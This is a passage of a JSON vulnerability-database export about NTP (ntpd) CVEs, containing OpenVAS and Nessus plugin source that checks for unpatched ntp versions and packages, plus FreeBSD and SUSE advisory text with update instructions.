a denial-of-service condition, denying service to legitimate\n users.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd versions 4.2.6 through 4.2.8p10 and before 4.2.8p11.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP.org's ntpd version 4.2.8p11 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\") {\n if((revcomp(a:version, b:\"4.2.6\") >= 0) && (revcomp(a:version, b:\"4.2.8p11\") < 0)) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"4.2.8p11\", install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-17T16:58:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8936", "CVE-2018-7184", "CVE-2015-5146", "CVE-2015-7973", "CVE-2015-7704", "CVE-2018-7183"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-04-16T00:00:00", "published": "2020-04-16T00:00:00", "id": "OPENVAS:1361412562311220201457", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201457", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1457)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from the referenced\n# advisories, and are Copyright (C) by the respective right holder(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1457\");\n script_version(\"2020-04-16T05:55:39+0000\");\n script_cve_id(\"CVE-2015-5146\", \"CVE-2015-7973\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2019-8936\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-16 05:55:39 +0000 (Thu, 16 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-16 05:55:39 +0000 (Thu, 16 Apr 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1457)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.2\\.2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1457\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1457\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1457 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"NTP through 4.2.8p12 has a NULL Pointer Dereference.(CVE-2019-8936)\n\nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the 'received' timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.(CVE-2018-7184)\n\nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.(CVE-2018-7183)\n\nNTP before 4.2.8p6 and 4.3.x before 4.3.90, when configured in broadcast mode, allows man-in-the-middle attackers to conduct replay attacks by sniffing the network.(CVE-2015-7973)\n\nntpd in ntp before 4.2.8p3 with remote configuration enabled allows remote authenticated users with knowledge of the configuration password and access to a computer entrusted to perform remote configuration to cause a denial of service (service crash) via a NULL byte in a crafted configuration directive packet.(CVE-2015-5146)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization 3.0.2.2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.2.2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.2.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.2.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.2.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812791", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812791", "type": "openvas", "title": "NTP.org 'ntpd' 'received' Timestamp Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP 'received' Timestamp Denial of Service Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812791\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7184\");\n script_bugtraq_id(103192);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 11:57:40 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' 'received' Timestamp Denial of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3453\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to a denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because ntpd in ntp drops\n bad packets before updating the 'received' timestamp.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial-of-service condition, denying service to legitimate\n users.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd versions from 4.2.8p4 and before 4.2.8p11.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP.org's ntpd version 4.2.8p11\n or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\\.8\") {\n if((revcomp(a:version, b:\"4.2.8p4\") >= 0) && (revcomp(a:version, b:\"4.2.8p11\") < 0)) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"4.2.8p11\", install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:59", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "\nNetwork Time Foundation reports:\n\nThe NTP Project at Network Time Foundation is releasing ntp-4.2.8p11.\nThis release addresses five security issues in ntpd:\n\nLOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil\n\t vulnerability: ephemeral association attack\nINFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909:\n\t ctl_getitem(): buffer read overrun leads to undefined\n\t behavior and information leak\nLOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple\n\t authenticated ephemeral associations\nLOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved\n\t symmetric mode cannot recover from bad state\nLOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909:\n\t Unauthenticated packet can reset authenticated interleaved\n\t association\n\none security issue in ntpq:\n\nMEDIUM: Sec 3414 / CVE-2018-7183 / VU#961909:\n\t ntpq:decodearr() can write beyond its buffer limit\n\nand provides over 33 bugfixes and 32 other improvements.\n\n", "edition": 6, "modified": "2018-03-14T00:00:00", "published": "2018-02-27T00:00:00", "id": "AF485EF4-1C58-11E8-8477-D05099C0AE8C", "href": "https://vuxml.freebsd.org/freebsd/af485ef4-1c58-11e8-8477-d05099c0ae8c.html", "title": "ntp -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-20T14:51:35", "description": "This update for ntp fixes the following issues: Security issues \nfixed :\n\n - CVE-2016-1549: Significant additional protections\n against CVE-2016-1549 that was fixed in ntp-4.2.8p7\n (bsc#1082210).\n\n - CVE-2018-7170: Ephemeral association time spoofing\n additional protection (bsc#1083424).\n\n - CVE-2018-7182: Buffer read overrun leads information\n leak in ctl_getitem() (bsc#1083426).\n\n - CVE-2018-7183: decodearr() can write beyond its buffer\n limit (bsc#1083417).\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state (bsc#1083422).\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association (bsc#1083420). Bug\n fixes :\n\n - bsc#1077445: Don't use libevent's cached time stamps in\n sntp.\n\n - Disable CMAC in ntp when building against a version of\n OpenSSL that doesn't support it.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-27T00:00:00", "title": "SUSE SLES11 Security Update : ntp (SUSE-SU-2018:0808-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2018-03-27T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ntp-doc", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-0808-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108651", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0808-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108651);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLES11 Security Update : ntp (SUSE-SU-2018:0808-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues: Security issues \nfixed :\n\n - CVE-2016-1549: Significant additional protections\n against CVE-2016-1549 that was fixed in ntp-4.2.8p7\n (bsc#1082210).\n\n - CVE-2018-7170: Ephemeral association time spoofing\n additional protection (bsc#1083424).\n\n - CVE-2018-7182: Buffer read overrun leads information\n leak in ctl_getitem() (bsc#1083426).\n\n - CVE-2018-7183: decodearr() can write beyond its buffer\n limit (bsc#1083417).\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state (bsc#1083422).\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association (bsc#1083420). Bug\n fixes :\n\n - bsc#1077445: Don't use libevent's cached time stamps in\n sntp.\n\n - Disable CMAC in ntp when building against a version of\n OpenSSL that doesn't support it.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180808-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c386533\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-ntp-13534=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-ntp-13534=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-4.2.8p11-64.4.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-doc-4.2.8p11-64.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:37:02", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-18T00:00:00", "title": "openSUSE Security Update : ntp (openSUSE-2018-376)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:ntp"], "id": "OPENSUSE-2018-376.NASL", "href": "https://www.tenable.com/plugins/nessus/109102", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-376.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109102);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"openSUSE Security Update : ntp (openSUSE-2018-376)\");\n script_summary(english:\"Check for the openSUSE-2018-376 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ntp-4.2.8p11-31.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ntp-debuginfo-4.2.8p11-31.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ntp-debugsource-4.2.8p11-31.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-debuginfo / ntp-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:46:20", "description": "This update for ntp fixes the following issues :\n\nUpdate to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. 